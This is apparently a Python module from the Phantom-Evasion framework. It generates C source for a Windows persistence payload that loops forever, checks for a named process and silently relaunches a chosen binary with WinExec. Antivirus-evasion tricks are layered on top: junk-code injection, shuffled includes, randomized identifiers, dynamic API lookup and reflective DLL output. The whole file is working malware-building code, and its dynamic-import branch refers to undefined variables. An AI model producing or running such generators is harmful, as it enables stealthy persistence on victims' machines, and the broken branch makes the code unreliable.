
     ########################################################################################
     #                                                                                      #
     #    This file is part of Phantom-Evasion.                                             #
     #                                                                                      #
     #    Phantom-Evasion is free software: you can redistribute it and/or modify           #
     #    it under the terms of the GNU General Public License as published by              #
     #    the Free Software Foundation, either version 3 of the License, or                 #
     #    (at your option) any later version.                                               #
     #                                                                                      #
     #    Phantom-Evasion is distributed in the hope that it will be useful,                #
     #    but WITHOUT ANY WARRANTY; without even the implied warranty of                    #
     #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the                     #
     #    GNU General Public License for more details.                                      #
     #                                                                                      #  
     #    You should have received a copy of the GNU General Public License                 #
     #   along with Phantom-Evasion.  If not, see <http://www.gnu.org/licenses/>.           #
     #                                                                                      #
     ########################################################################################

import sys 
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import JunkInjector
from usefull import WindowsDefend
from usefull import IncludeShuffler
from usefull import WindowsDecoyProc
from usefull import CloseDecoyProc
from usefull import WriteSource
 
def Persistence_C_KeepAliveProcess_windows(ModOpt):

    FilePath = ModOpt["Binpath"]
    Procname = ModOpt["ProcTarget"]
    WaitBeforeCheck = ModOpt["Timevar"]
    RandBool= varname_creator()
    RandEntry = varname_creator()
    RandHandle = varname_creator()

    Ret_code = ""

    IncludeList = ["#include <windows.h>\n","#include <stdio.h>\n","#include <string.h>\n","#include <math.h>\n","#include <time.h>\n","#include <tlhelp32.h>\n"]

    Ret_code += IncludeShuffler(IncludeList)

    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"
        
        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"

        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    Ret_code += "while (TRUE){\n"
    Ret_code += "BOOL " + RandBool + " = FALSE;\n"
    Ret_code += "PROCESSENTRY32 " + RandEntry + ";\n"
    Ret_code +=  RandEntry + ".dwSize = sizeof(PROCESSENTRY32);\n"

    
    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt["Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    if ModOpt["DynImport"] == True:

        NdcTl32Snapshot = varname_creator()
        NdcProcess32First = varname_creator()
        NdcProcess32Next = varname_creator()
        NdcOpenProcess = varname_creator()
        NdcWinExec = varname_creator()

        Ret_code += "FARPROC " + NdcTl32Snapshot + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"CreateToolhelp32Snapshot\");\n"
        Ret_code += "HANDLE " + RandProcsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPPROCESS, 0);\n"
        Ret_code += "FARPROC " + NdcProcess32First + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Process32First\");\n"
        Ret_code += "FARPROC " + NdcProcess32Next + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Process32Next\");\n"
        Ret_code += "FARPROC " + NdcOpenProcess + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"OpenProcess\");\n"
        Ret_code += "if (" + NdcProcess32First + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "if (strcmp(" + RandEntry + ".szExeFile, \"" + Procname + "\") == 0){" + RandBool + " = TRUE;}\n"
        Ret_code += "while (" + NdcProcess32Next + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "if (strcmp(" + RandEntry + ".szExeFile, \"" + Procname + "\") == 0){" + RandBool + " = TRUE;}\n"
        Ret_code += "FARPROC " + NdcWinExec + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"WinExec\");\n"
        Ret_code += "if (" + RandBool + " == FALSE ){" + NdcWinExec + "(\"" + FilePath + "\",0);}}\n"
    else:

        Ret_code += "HANDLE " + RandHandle + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);\n"
        Ret_code += "if (Process32First(" + RandHandle + ", &" + RandEntry + ")){\n"
        Ret_code += "if (strcmp(" + RandEntry + ".szExeFile, \"" + Procname + "\") == 0){" + RandBool + " = TRUE;}\n"
        Ret_code += "while (Process32Next(" + RandHandle + ", &" + RandEntry + ")){\n"
        Ret_code += "if (strcmp(" + RandEntry + ".szExeFile, \"" + Procname + "\") == 0){" + RandBool + " = TRUE;}}\n"
        Ret_code += "CloseHandle(" + RandHandle + ");\n"
        Ret_code += "if (" + RandBool + " == FALSE ){WinExec(\"" + FilePath + "\",0);}}\n"
        
    Ret_code += "Sleep(" + WaitBeforeCheck + ");}\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    Ret_code = JunkInjector(Ret_code,ModOpt["JI"],ModOpt["JF"],ModOpt["EF"],ModOpt["JR"])

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":
        
        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c",Ret_code)




